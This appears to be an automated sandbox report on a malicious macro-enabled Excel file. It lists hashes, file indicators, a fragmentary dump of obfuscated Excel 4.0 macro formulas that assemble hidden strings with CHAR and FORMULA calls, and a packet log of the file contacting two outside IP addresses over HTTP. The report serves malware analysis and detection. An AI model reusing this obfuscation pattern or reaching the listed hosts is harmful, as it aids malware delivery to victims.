SHA512:	299cede17c56abdc408a56ecffc934d2f7947d124d3494dd68534e5fe8f0255986335286a8e8799eb64c7ecf99acf45aadbb6df3475ca33ac9a3d4e8e7de6aca
SSDEEP:	768:w/I83bP2rjevZCwVIHkvxmUxjfC30+kS4QyoO0VIXlvjyh:wnaIIHkvxXYk4pTVIt2
File Content Preview:	PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "DOC-0212.xlsm"

Indicators
Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

4,7,=CHAR('Ss1'!E45)
11,1,o

1,5,L
11,1,=CHAR('Ss1'!N43)

2,0,r
10,4,=CHAR('Ss1'!D39)

1,8,C
12,3,=CHAR('Ss1'!S46)

1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)

2,7,=
8,2,=CHAR('Ss1'!G40)

1,2,A
7,8,=CHAR('Ss1'!J39)

2,6,=CHAR('Ss1'!R41)
9,1,e

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 14:31:34.448029995 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:34.626717091 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:34.626876116 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:34.627537966 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:34.806072950 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.181148052 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.181179047 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.181190968 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.181201935 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.181335926 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.182256937 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.182326078 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.237093925 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.237119913 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.237214088 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.237240076 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.244168997 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.244185925 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.244194984 CET	80	49165	194.233.67.242	192.168.2.22
Dec 2, 2021 14:31:35.244275093 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.244307041 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.244309902 CET	49165	80	192.168.2.22	194.233.67.242
Dec 2, 2021 14:31:35.603188038 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:35.863559961 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:35.863759995 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:35.864459038 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.121215105 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.126859903 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.126895905 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.126919031 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.126943111 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.126980066 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.126985073 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127012968 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127013922 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.127017021 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127019882 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127022028 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127036095 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.127049923 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127058983 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.127068996 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127083063 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.127101898 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127108097 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.127120972 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.127141953 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.136845112 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.386648893 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.386734009 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.386795998 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.386848927 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.386898041 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.386914015 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.386949062 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.386953115 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.386956930 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.386996031 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387003899 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387047052 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387054920 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387100935 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387105942 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387150049 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387157917 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387202978 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387207985 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387252092 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387258053 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387300968 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387309074 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387351036 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.387360096 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.387403965 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.388763905 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647444963 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647475004 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647488117 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647500992 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647517920 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647535086 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647551060 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647567034 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647583961 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647600889 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647617102 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647634029 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647650003 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647654057 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647666931 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647684097 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647695065 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647700071 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647701979 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647703886 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647707939 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647717953 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647720098 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647732019 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647738934 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647757053 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647764921 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647775888 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647778034 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647789955 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647795916 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647804976 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647814035 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647830963 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647830963 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647846937 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647849083 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647866011 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647866964 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647883892 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.647883892 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647896051 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.647912979 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.649521112 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904639959 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904666901 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904679060 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904691935 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904710054 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904726982 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904742956 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904761076 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904777050 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904794931 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904812098 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904812098 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904829979 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904841900 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904864073 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904865980 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904871941 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904875040 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904885054 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904902935 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904903889 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904917002 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904921055 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904933929 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904938936 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904951096 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904956102 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904968023 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904973984 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904983044 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.904992104 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.904999971 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905009985 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905016899 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905028105 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905045033 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905045033 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905059099 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905062914 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905080080 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905081987 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905100107 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905102015 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905116081 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905117035 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905129910 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905134916 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905147076 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905152082 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905168056 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905168056 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.905181885 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.905200005 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.906219006 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.906236887 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.906250000 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.906263113 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:36.906339884 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:36.906891108 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165230989 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165266037 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165280104 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165297031 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165317059 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165333033 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165349960 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165366888 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165383101 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165399075 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165414095 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165426970 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165443897 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165460110 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165462017 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165477037 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165493965 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165494919 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165498018 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165499926 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165513039 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165514946 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165529966 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165530920 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165545940 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165549040 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165566921 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165570974 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165585041 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165595055 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165601969 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.165621996 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165626049 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.165632963 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.166914940 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.166944027 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.166961908 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.166979074 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.166996002 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167012930 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167026997 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167030096 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167047024 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167047977 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167056084 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167068005 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167068958 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167084932 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167085886 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167103052 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167119980 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167123079 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167136908 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167143106 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167146921 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167155027 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167157888 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167172909 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167175055 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167190075 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167191029 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167207956 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167208910 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167223930 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167224884 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167238951 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167243004 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167257071 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167260885 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167273998 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167278051 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167290926 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167294979 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167306900 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167311907 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167326927 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167330027 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167346001 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167350054 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167363882 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.167366982 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167382956 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.167396069 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.171231985 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.172460079 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.422370911 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422410965 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422424078 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422436953 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422447920 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422461033 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422477961 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422493935 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.422622919 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424032927 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424062014 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424074888 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424093962 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424103022 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424110889 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424129009 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424141884 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424146891 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424165010 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424171925 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424182892 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424190044 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424202919 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424206018 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424221039 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424221039 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424236059 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424241066 CET	80	49166	47.96.4.95	192.168.2.22
Dec 2, 2021 14:31:37.424252033 CET	49166	80	192.168.2.22	47.96.4.95
Dec 2, 2021 14:31:37.424257994 CET	80	49166	47.96.4.95	192.168.2.22
